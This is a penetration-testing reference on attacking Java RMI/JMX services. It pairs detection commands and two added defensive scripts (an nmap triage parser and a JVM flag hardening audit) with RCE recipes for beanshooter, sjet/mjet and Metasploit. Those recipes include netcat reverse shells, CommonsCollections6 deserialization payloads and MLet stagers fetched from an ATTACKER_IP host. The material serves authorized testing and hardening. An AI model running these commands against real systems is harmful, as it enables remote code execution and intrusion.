# Java RMI

> Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even when the two JVMs run on different physical machines. RMI provides a mechanism for Java-based distributed computing.

## Summary

* [Tools](#tools)
* [Detection](#detection)
* [Methodology](#methodology)
    * [RCE using beanshooter](#rce-using-beanshooter)
    * [RCE using sjet or mjet](#rce-using-sjet-or-mjet)
    * [RCE using Metasploit](#rce-using-metasploit)
* [References](#references)

## Tools

* siberas/sjet - siberas JMX exploitation toolkit
* mogwailabs/mjet - MOGWAI LABS JMX exploitation toolkit
* qtc-de/remote-method-guesser - Java RMI vulnerability scanner
## Detection

* Using nmap:

```bash
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
1089/tcp open  java-rmi Java RMI
| rmi-vuln-classloader:
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
```
* Using qtc-de/remote-method-guesser:

```bash
$ rmg scan 172.17.0.2 --ports 0-65535
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC)
[+] [6234 / 6234] [#############################] 100%
[+] Portscan finished.

$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+]   --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
[+] - legacy-service
[+]   --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
[+] - plain-server
[+]   --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
[...]
```
* Using rapid7/metasploit-framework:

```bash
use auxiliary/scanner/misc/java_rmi_server
set RHOSTS <IPs>
set RPORT <PORT>
run
```
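For triaging the nmap output above at scale, the following added example (not part of the original page) parses the `rmi-vuln-classloader` and `rmi-dumpregistry` script sections, records which ports accept remote codebases and which names are bound in each registry, and turns that into defender-side checks. The sample output is constructed to mirror the layout shown above; the second port and the class `de.example.IPlainServer` are invented.

```python
import re

# Constructed sample: the shape of `nmap -sV --script "rmi-dumpregistry or
# rmi-vuln-classloader"` output for one host. The first port mirrors the run
# shown on this page; the second port is an invented custom RMI service.
SAMPLE_NMAP = """\
PORT     STATE SERVICE  VERSION
1089/tcp open  java-rmi Java RMI
| rmi-vuln-classloader:
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
1099/tcp open  java-rmi Java RMI
| rmi-dumpregistry:
|   plain-server
|     de.example.IPlainServer
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+java-rmi")
NAME_RE = re.compile(r"^\|\s{3}(\S+)$")    # bound name: exactly 3-space indent
CLASS_RE = re.compile(r"^\|\s{5}(\S+)$")   # stub/interface class: 5-space indent


def parse_nmap_rmi(text):
    """One record per java-rmi port:
    {"port": int, "classloader_vulnerable": bool, "bound": {name: class_or_None}}"""
    records, current, section, last_name = [], None, None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "classloader_vulnerable": False, "bound": {}}
            records.append(current)
            section, last_name = None, None
            continue
        if current is None:
            continue                       # header lines before the first port
        if line.startswith("| rmi-vuln-classloader:"):
            section = "vuln"
        elif line.startswith("| rmi-dumpregistry:"):
            section = "registry"
        elif section == "vuln" and re.search(r"State:\s+VULNERABLE\b", line):
            current["classloader_vulnerable"] = True
        elif section == "registry":
            m = NAME_RE.match(line)
            if m:
                last_name = m.group(1)
                current["bound"].setdefault(last_name, None)
                continue
            m = CLASS_RE.match(line)
            if m and last_name and current["bound"][last_name] is None:
                current["bound"][last_name] = m.group(1)   # first class line only
    return records


def assess(records):
    """Defender's triage: (port, what to verify or fix) for each finding."""
    findings = []
    for r in records:
        if r["classloader_vulnerable"]:
            findings.append((r["port"],
                "registry accepts remote codebases: run the JVM with "
                "java.rmi.server.useCodebaseOnly=true (the JDK 7u21+ default)"))
        if "jmxrmi" in r["bound"]:
            findings.append((r["port"],
                "JMX connector exposed: confirm com.sun.management.jmxremote.authenticate=true "
                "and com.sun.management.jmxremote.ssl=true, and restrict the port at the network"))
        for name, cls in r["bound"].items():
            if name != "jmxrmi":
                findings.append((r["port"],
                    f"custom remote object {name} ({cls}): verify it is meant to be "
                    "reachable from this network segment"))
    return findings


if __name__ == "__main__":
    for port, msg in assess(parse_nmap_rmi(SAMPLE_NMAP)):
        print(f"{port}: {msg}")
```

Feed it the saved nmap output of an internal scan (`nmap -oN`) instead of `SAMPLE_NMAP` to get an inventory of exposed registries and bound names; a `jmxrmi` binding is the signal that the JMX attack paths described below apply to that host.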
## Methodology

Java Remote Method Invocation (RMI) services, when misconfigured, are vulnerable to several remote code execution (RCE) techniques. One of them is to host an MLet file and have the JMX service load an MBean from a remote server, which tools such as mjet or sjet automate. The more recent remote-method-guesser tool combines enumeration of RMI services with an overview of the known attack strategies.
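The misconfigurations that make the attacks in this section possible are a handful of JVM system properties. The following added example (not code from the original page) audits the `-D` flags a JMX-enabled JVM was started with for the weak settings and rewrites them to a hardened set. The weak command line is constructed, the password/access file paths are hypothetical, and the `jdk.serialFilter` value is an illustrative deny-list of the gadget library named on this page (`CommonsCollections6`); an allow-list of the application's own remote types is the stronger choice.

```python
import shlex

# Constructed: a JMX agent started the way many tutorials show it.
WEAK_CMDLINE = (
    "java -Dcom.sun.management.jmxremote "
    "-Dcom.sun.management.jmxremote.port=9010 "
    "-Dcom.sun.management.jmxremote.authenticate=false "
    "-Dcom.sun.management.jmxremote.ssl=false "
    "-Djava.rmi.server.useCodebaseOnly=false "
    "-jar app.jar"
)


def system_properties(cmdline):
    """Map of -Dkey=value flags; a bare -Dkey is recorded as 'true'."""
    props = {}
    for tok in shlex.split(cmdline):
        if tok.startswith("-D"):
            key, _, value = tok[2:].partition("=")
            props[key] = value if value else "true"
    return props


# (property, unsafe value, remediation). A property that is absent keeps its
# JDK default, which is the safe value for all three, so only explicit
# opt-outs are reported.
CHECKS = [
    ("com.sun.management.jmxremote.authenticate", "false",
     "set to true and point com.sun.management.jmxremote.password.file and "
     ".access.file at files readable only by the service user"),
    ("com.sun.management.jmxremote.ssl", "false",
     "set to true so credentials and serialized objects are not sent in clear"),
    ("java.rmi.server.useCodebaseOnly", "false",
     "set to true (the JDK 7u21+ default) so stubs cannot pull classes from a "
     "client-supplied codebase"),
]


def audit(cmdline):
    """Findings for a JVM command line; empty when nothing is exposed remotely."""
    props = system_properties(cmdline)
    if "com.sun.management.jmxremote.port" not in props:
        return []   # no remote JMX agent from these flags; nothing listens over RMI
    findings = [f"{key}={bad}: {fix}" for key, bad, fix in CHECKS if props.get(key) == bad]
    if "jdk.serialFilter" not in props:
        findings.append("no deserialization filter: set jdk.serialFilter (JEP 290, "
                        "JDK 9+ / 8u121+) to reject gadget classes or allow-list app types")
    return findings


def hardened(cmdline):
    """Same command line with the weak flags replaced by safe values."""
    props = system_properties(cmdline)
    props.update({
        "com.sun.management.jmxremote.authenticate": "true",
        "com.sun.management.jmxremote.ssl": "true",
        # hypothetical paths; both files must be owned by and readable only by the service user
        "com.sun.management.jmxremote.password.file": "/etc/app/jmxremote.password",
        "com.sun.management.jmxremote.access.file": "/etc/app/jmxremote.access",
        "java.rmi.server.useCodebaseOnly": "true",
        # illustrative deny-list for the commons-collections gadget chains; prefer an allow-list
        "jdk.serialFilter": "!org.apache.commons.collections.**;"
                            "!org.apache.commons.collections4.**;maxdepth=32",
    })
    rest = [t for t in shlex.split(cmdline) if not t.startswith("-D")]
    flags = [shlex.quote(f"-D{k}={v}") for k, v in props.items()]
    return " ".join([rest[0], *flags, *rest[1:]])


if __name__ == "__main__":
    for finding in audit(WEAK_CMDLINE):
        print("[-]", finding)
    print(hardened(WEAK_CMDLINE))
```

Run it against `ps -o args= -p <pid>` of a suspect JVM; an empty result from `audit()` only covers agents started through these flags, so an application that creates its own `JMXConnectorServer` in code must be checked in its source instead.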
### RCE using beanshooter

* List available attributes: `beanshooter info 172.17.0.2 9010`
* Display the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose`
* Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean`
* Bruteforce a password-protected JMX service: `beanshooter brute 172.17.0.2 1090`
* List registered MBeans: `beanshooter list 172.17.0.2 9010`
* Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000`
* Enumerate a JMX endpoint: `beanshooter enum 172.17.0.2 1090`
* Invoke a method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
* Invoke arbitrary public and static Java methods:

  ```bash
  beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
  beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
  ```

* Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
* Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
### RCE using sjet or mjet

The attack involves the following steps:

* Using JMX, the `getMBeansFromURL` method of the `javax.management.loading.MLet` MBean on the target server is invoked with the web server URL as its parameter. The JMX service then connects to the HTTP server and parses the MLet file.

Exploit JMX using siberas/sjet or mogwailabs/mjet:

```bash
jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
jython sjet.py TARGET_IP TARGET_PORT super_secret shell
jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall

jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
```
### RCE using Metasploit

```bash
use exploit/multi/misc/java_rmi_server
set RHOSTS <IPs>
set RPORT <PORT>
# configure also the payload if needed
run
```